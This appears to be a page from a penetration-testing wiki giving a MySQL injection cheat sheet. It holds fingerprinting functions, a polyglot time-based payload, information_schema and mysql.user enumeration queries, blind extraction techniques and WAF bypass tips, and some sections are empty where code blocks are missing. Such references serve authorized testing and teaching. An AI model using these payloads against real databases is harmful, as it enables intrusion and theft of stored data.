search

MySQL injection

This is a basic flow of how to confirm and perform a basic MySQL Injection. For more information go to: https://github.com/carlospolop-forks/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.mdarrow-up-right

 Comment for MySQL version 3.23.02

hashtag
Interesting Functions

hashtag
Confirm Mysql:

concat('a','b')database()version()user()system_user()@@version@@datadirrand()floor(2.9)length(1)count(1)

hashtag
Useful functions

SELECT hex(database())SELECT conv(hex(database()),16,10) SELECT DECODE(ENCODE('cleartext', 'PWD'), 'PWD')SELECT uncompress(compress(database())) SELECT replace(database(),"r","R")SELECT substr(database(),1,1)='r'SELECT substring(database(),1,1)=0x72SELECT ascii(substring(database(),1,1))=114SELECT database()=char(114,101,120,116,101,115,116,101,114)SELECT group_concat(<COLUMN>) FROM <TABLE>SELECT group_concat(if(strcmp(table_schema,database()),table_name,null))SELECT group_concat(CASE(table_schema)When(database())Then(table_name)END)strcmp(),mid(),,ldap(),rdap(),left(),rigth(),instr(),sleep()

hashtag
All injection

SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"

from https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/arrow-up-right

hashtag
Flow

Remember that in "modern" versions of MySQL you can substitute "information_schema.tables" for "mysql.innodb_table_stats" (This could be useful to bypass WAFs).

SELECT table_name FROM information_schema.tables WHERE table_schema=database();SELECT column_name FROM information_schema.columns WHERE table_name=""; SELECT <COLUMN1>,<COLUMN2> FROM <TABLE_NAME>; SELECT user FROM mysql.user WHERE file_priv='Y';

hashtag
Only 1 value

  • group_concat()

  • Limit X,1

hashtag
Blind one by one

  • substr(version(),X,1)='r' or substring(version(),X,1)=0x70 or ascii(substr(version(),X,1))=112

  • mid(version(),X,1)='5'

hashtag
Blind adding

  • LPAD(version(),1...lenght(version()),'1')='asd'...

  • RPAD(version(),1...lenght(version()),'1')='asd'...

  • SELECT RIGHT(version(),1...lenght(version()))='asd'...

  • SELECT LEFT(version(),1...lenght(version()))='asd'...

  • SELECT INSTR('foobarbar', 'fo...')=1

hashtag
Detect number of columns

Using a simple ORDER

hashtag
MySQL Union Based

hashtag
SSRF

Learn here different options to abuse a Mysql injection to obtain a SSRF.

hashtag
WAF bypass tricks

hashtag
Information_schema alternatives

Remember that in "modern" versions of MySQL you can substitute information_schema.tables for mysql.innodb_table_stats or for sys.x$schema_flattened_keys or for sys.schema_table_statistics

hashtag
MySQLinjection without COMMAS

Select 2 columns without using any comma (https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-commaarrow-up-right):

hashtag
Retrieving values without the column name

If at some point you know the name of the table but you don't know the name of the columns inside the table, you can try to find how may columns are there executing something like:

Supposing there is 2 columns (being the first one the ID) and the other one the flag, you can try to bruteforce the content of the flag trying character by character:

More info in https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952arrow-up-right

hashtag
MySQL history

You ca see other executions inside the MySQL reading the table: sys.x$statement_analysis

hashtag
Version alternatives

上一页RCE with PostgreSQL Extensions下一页Mysql SSRF

最后更新于

这有帮助吗?